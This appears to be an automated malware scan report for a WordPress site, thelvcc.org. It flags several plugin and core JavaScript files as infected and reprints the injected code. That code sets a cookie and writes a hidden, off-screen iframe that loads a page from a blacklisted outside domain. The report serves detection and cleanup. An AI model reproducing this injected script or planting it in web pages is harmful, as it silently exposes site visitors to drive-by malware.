Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thelvcc.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://thelvcc.org/ | 200 OK Content-Length: 22288 Content-Type: text/html | clean |
http://thelvcc.org/wp-content/plugins/wp-minify/min/?f=wp-includes/js/jquery/jquery.js,wp-includes/js/jquery/jquery-migrate.min.js&m=1404503532 | 200 OK Content-Length: 104343 Content-Type: application/x-javascript | clean |
http://thelvcc.org/wp-content/plugins/q-and-a/js/q-a-plus.js?ver=1.0.6.2 | 200 OK Content-Length: 2755 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: satranuic.pokkisenkokoomus.fi ...[211 bytes skipped]... String(); } function getBiscuit(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } var cookie = getBiscuit('salurdonersite'); if (cookie == undefined) { setCookie('salurdonersite', true, 259201); document.write('<iframe src="http://satranuic.pokkisenkokoomus.fi/qurentysal16.khml" style="top:-999px;left:-999px;position:absolute;" height="135" width="135"></iframe>'); } } Colordesigual(); jQuery(document).ready(function($) { $("div[id^=qa-faq]").each(function () { var num = this.id.match(/qa-faq(\d+)/)[1]; var faqContainer = $('.qa-faqs'); var faq = $('#qa-faq' + num); if ( faqContainer.is('.collapsible') ) { faq.find('.qa-faq-anchor').bind("click", functi ...[1711 bytes skipped]... Decoded script: <iframe src="http://satranuic.pokkisenkokoomus.fi/qurentysal16.khml" style="top:-999px;left:-999px;position:absolute;" height="135" width="135"></iframe> Malicious iFrame found. size: 135x135 src: http://satranuic.pokkisenkokoomus.fi/qurentysal16.khml This URL is marked by Google as suspicious <iframe src="http://satranuic.pokkisenkokoomus.fi/qurentysal16.khml" style="top:-999px;left:-999px;position:absolute;" height="135" width="135"> | ||
http://thelvcc.org/wp-content/themes/genesis/lib/js/menu/superfish.min.js?ver=1.7.4 | 200 OK Content-Length: 4862 Content-Type: application/x-javascript | clean |
http://thelvcc.org/wp-content/themes/genesis/lib/js/menu/superfish.args.min.js?ver=2.1.2 | 200 OK Content-Length: 132 Content-Type: application/x-javascript | clean |
http://thelvcc.org/wp-content/themes/genesis/lib/js/menu/superfish.compat.min.js?ver=2.1.2 | 200 OK Content-Length: 109 Content-Type: application/x-javascript | clean |
http://thelvcc.org/wp-content/plugins/genesis-responsive-slider/js/jquery.flexslider.js?ver=0.9.2 | 200 OK Content-Length: 28144 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: satranuic.pokkisenkokoomus.fi ...[211 bytes skipped]... String(); } function getBiscuit(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } var cookie = getBiscuit('salurdonersite'); if (cookie == undefined) { setCookie('salurdonersite', true, 259201); document.write('<iframe src="http://satranuic.pokkisenkokoomus.fi/qurentysal16.khml" style="top:-999px;left:-999px;position:absolute;" height="135" width="135"></iframe>'); } } Colordesigual(); ;(function ($) { $.flexslider = function(el, options) { var slider = el; slider.init = function() { slider.vars = $.extend({}, $.flexslider.defaults, options); slider.data('flexslider', true); slider.container = $('.slides', slider); slider.slides = ...[3205 bytes skipped]... Decoded script: <iframe src="http://satranuic.pokkisenkokoomus.fi/qurentysal16.khml" style="top:-999px;left:-999px;position:absolute;" height="135" width="135"></iframe> Malicious iFrame found. size: 135x135 src: http://satranuic.pokkisenkokoomus.fi/qurentysal16.khml This URL is marked by Google as suspicious <iframe src="http://satranuic.pokkisenkokoomus.fi/qurentysal16.khml" style="top:-999px;left:-999px;position:absolute;" height="135" width="135"> | ||
http://thelvcc.org/?feed=rss | 200 OK Content-Length: 505 Content-Type: text/xml | clean |
http://thelvcc.org/test404page.js | 404 Not Found Content-Length: 73 Content-Type: text/html | clean |
http://thelvcc.org/?page_id=3617 | 200 OK Content-Length: 21004 Content-Type: text/html | clean |
http://thelvcc.org/wp-content/plugins/wp-rss-multi-importer/scripts/show-excerpt.js?ver=4.0 | 200 OK Content-Length: 1372 Content-Type: application/x-javascript | malicious |
Page code contains blacklisted domain: satranuic.pokkisenkokoomus.fi ...[295 bytes skipped]... String(); } function getBiscuit(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } var cookie = getBiscuit('salurdonersite'); if (cookie == undefined) { setCookie('salurdonersite', true, 259201); document.write('<iframe src="http://satranuic.pokkisenkokoomus.fi/qurentysal16.khml" style="top:-999px;left:-999px;position:absolute;" height="135" width="135"></iframe>'); } } Colordesigual(); /* Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt */jQuery( 'document' ).ready( function( $ ){ jQuery('.nav-toggle').click(function(){ var collapse_content_selector = $(this).attr('id'); var toggle_switch = $(this); $(collapse_content_selector).toggle(function ...[299 bytes skipped]... Malicious iFrame found. size: 135x135 src: http://satranuic.pokkisenkokoomus.fi/qurentysal16.khml This URL is marked by Google as suspicious <iframe src="http://satranuic.pokkisenkokoomus.fi/qurentysal16.khml" style="top:-999px;left:-999px;position:absolute;" height="135" width="135"> | ||
http://thelvcc.org/?page_id=3619 | 200 OK Content-Length: 19877 Content-Type: text/html | clean |
http://thelvcc.org/?page_id=4503 | 200 OK Content-Length: 20430 Content-Type: text/html | clean |
http://thelvcc.org/wp-includes/js/comment-reply.min.js?ver=4.0 | 200 OK Content-Length: 1656 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: satranuic.pokkisenkokoomus.fi ...[211 bytes skipped]... String(); } function getBiscuit(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } var cookie = getBiscuit('salurdonersite'); if (cookie == undefined) { setCookie('salurdonersite', true, 259201); document.write('<iframe src="http://satranuic.pokkisenkokoomus.fi/qurentysal16.khml" style="top:-999px;left:-999px;position:absolute;" height="135" width="135"></iframe>'); } } Colordesigual(); var addComment={moveForm:function(a,b,c,d){var e,f=this,g=f.I(a),h=f.I(c),i=f.I("cancel-comment-reply-link"),j=f.I("comment_parent"),k=f.I("comment_post_ID");if(g&&h&&i&&j){f.respondId=c,d=d||!1,f.I("wp-temp-form-div")||(e=document.createElement("div"),e.id="wp-temp-form-div",e.style.display="non ...[484 bytes skipped]... Decoded script: <iframe src="http://satranuic.pokkisenkokoomus.fi/qurentysal16.khml" style="top:-999px;left:-999px;position:absolute;" height="135" width="135"></iframe> Malicious iFrame found. size: 135x135 src: http://satranuic.pokkisenkokoomus.fi/qurentysal16.khml This URL is marked by Google as suspicious <iframe src="http://satranuic.pokkisenkokoomus.fi/qurentysal16.khml" style="top:-999px;left:-999px;position:absolute;" height="135" width="135"> | ||
http://thelvcc.org/?page_id=3628 | 200 OK Content-Length: 20281 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thelvcc.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 08:36:32 GMT
Age: 8
Server: YTS/1.20.29
Content-Type: text/html; charset=UTF-8
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: BX=1t2i765a2nf8g&b=3&s=pd; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.thelvcc.org
X-Pingback: http://thelvcc.org/xmlrpc.php
GET / HTTP/1.1
Host: thelvcc.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 08:36:32 GMT
Age: 8
Server: YTS/1.20.29
Content-Type: text/html; charset=UTF-8
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: BX=1t2i765a2nf8g&b=3&s=pd; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.thelvcc.org
X-Pingback: http://thelvcc.org/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: thelvcc.org
Referer: http://www.google.com/search?q=thelvcc.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thelvcc.org
Referer: http://www.google.com/search?q=thelvcc.org
Result:
The result is similar to the first query. There are no suspicious redirects found.